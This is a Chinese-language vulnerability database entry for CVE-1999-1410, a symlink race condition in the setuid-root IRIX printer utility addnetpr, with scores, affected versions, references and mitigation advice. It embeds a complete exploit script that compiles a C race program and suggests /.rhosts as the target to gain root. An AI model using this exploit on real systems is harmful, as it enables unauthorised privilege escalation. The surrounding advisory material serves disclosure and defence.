CVE-1999-1410
CVSS6.2
发布时间 :1997-05-09 00:00:00
修订时间 :2016-10-17 22:04:13
NMCES    

[原文]addnetpr in IRIX 5.3 and 6.2 allows local users to overwrite arbitrary files and possibly gain root privileges via a symlink attack on the printers temporary file.


[CNNVD]IRIX /usr/lib/netaddpr漏洞(CNNVD-199705-010)

        IRIX 5.3和6.2上的addnetpr存在漏洞。本地用户可以通过打印临时文件上的符号链接覆盖任意文件并可能获得根权限。

- CVSS (基础分值)

CVSS分值: 6.2 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:5.0
cpe:/o:sgi:irix:6.0.1SGI IRIX 6.0.1
cpe:/o:sgi:irix:6.1SGI IRIX 6.1
cpe:/o:sgi:irix:5.2SGI IRIX 5.2
cpe:/o:sgi:irix:5.1.1SGI IRIX 5.1.1
cpe:/o:sgi:irix:6.0.1::xfsSGI IRIX 6.0.1 XFS
cpe:/o:sgi:irix:6.2SGI IRIX 6.2
cpe:/o:sgi:irix:5.1SGI IRIX 5.1
cpe:/o:sgi:irix:5.0.1SGI IRIX 5.0.1
cpe:/o:sgi:irix:5.3SGI IRIX 5.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1410
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1410
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199705-010
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/19961203-02-PX
(VENDOR_ADVISORY)  MISC  ftp://patches.sgi.com/support/free/security/advisories/19961203-02-PX
http://marc.info/?l=bugtraq&m=87602167420927&w=2
(UNKNOWN)  BUGTRAQ  19970509 Re: Irix: misc
http://www.securityfocus.com/bid/330
(VENDOR_ADVISORY)  BID  330

- 漏洞信息

IRIX /usr/lib/netaddpr漏洞
中危 其他
1997-05-09 00:00:00 2005-10-20 00:00:00
本地  
        IRIX 5.3和6.2上的addnetpr存在漏洞。本地用户可以通过打印临时文件上的符号链接覆盖任意文件并可能获得根权限。

- 公告与补丁

        A quick solution to this problem is to remove the setuid bit from the netaddpr program. This will prevent users from actively trying to exploit this problem. However, some risk still exists, as an attacker could wait until an administrator executes this program, and attempt to exploit the flaw at this time. While the likelihood of sucess is quite small, the risk still exists.
        Patches to this, and other printing related problems, are available from SGI.

- 漏洞信息 (19260)

SGI IRIX <= 6.2 /usr/lib/netaddpr Vulnerability (EDBID:19260)
irix local
1997-05-09 Verified
0 Jaechul Choe
N/A [点击下载]
source: http://www.securityfocus.com/bid/330/info

SGI's IRIX 5.x and 6.x operating system include a utility called /usr/lib/netaddpr. This program can be used by privledged users to add network printing devices to the system. A race condition exists in this program that could allow any "privledged" user to obtain root access.

The netaddpr program is shipped setuid root. As part of its execution, it creates a file in /var/tmp with the file template printersXXXXXX. Because the creation of the file and the actual opening of the file are independant events, there exists a window, during which time an attacker can replace the file with a symbolic link. By making this link point to, for instance, /.rhosts, an attacker can elevate their privledges to that of root. 

#!/bin/sh

PROG="`basename $0`"
if [ $# -ne 1 ]; then
       echo "Usage: $PROG <target>"
       exit 1
fi

cat > expnetpr.c << _CREDIT_TO_ZOMO_
void main(int argc, char *argv[])
{
    char *template = "/var/tmp/printersXXXXXX";
    char *target;
    int pid;

    target = (char *)mktemp(template);

    if ((pid = fork()) > 0) {
            sleep(3);
            umask(0);
            execl("/usr/lib/addnetpr", "addnetpr", "localhost","+", 0);
    }
    else
            while(1) {
                    symlink(argv[1], target);
                    unlink(target);
            }

}
_CREDIT_TO_ZOMO_

/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
     echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has been installed from the IDO"
     exit 1
fi

while(`true`)
do
      ./expnetpr $1&
      PID=$!
      sleep 15
      ls -al $1
      killall expnetpr
      killall addnetpr
done		

- 漏洞信息

IRIX /usr/lib/netaddpr Vulnerability
Race Condition Error 330
No Yes
1997-05-09 12:00:00 2009-07-11 12:16:00
This vulnerability was reported to the Bugtraq mailing list on May 9, 1997 by Jaechul Choe <poison@COSMOS.KAIST.AC.KR>.

- 受影响的程序版本

SGI IRIX 6.2
SGI IRIX 6.1
SGI IRIX 6.0.1 XFS
SGI IRIX 6.0.1
SGI IRIX 5.3
SGI IRIX 5.2
SGI IRIX 5.1.1
SGI IRIX 5.1
SGI IRIX 5.0.1
SGI IRIX 5.0

- 漏洞讨论

SGI's IRIX 5.x and 6.x operating system include a utility called /usr/lib/netaddpr. This program can be used by privledged users to add network printing devices to the system. A race condition exists in this program that could allow any "privledged" user to obtain root access.

The netaddpr program is shipped setuid root. As part of its execution, it creates a file in /var/tmp with the file template printersXXXXXX. Because the creation of the file and the actual opening of the file are independant events, there exists a window, during which time an attacker can replace the file with a symbolic link. By making this link point to, for instance, /.rhosts, an attacker can elevate their privledges to that of root.

- 漏洞利用

x

- 解决方案

A quick solution to this problem is to remove the setuid bit from the netaddpr program. This will prevent users from actively trying to exploit this problem. However, some risk still exists, as an attacker could wait until an administrator executes this program, and attempt to exploit the flaw at this time. While the likelihood of sucess is quite small, the risk still exists.

Patches to this, and other printing related problems, are available from SGI.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站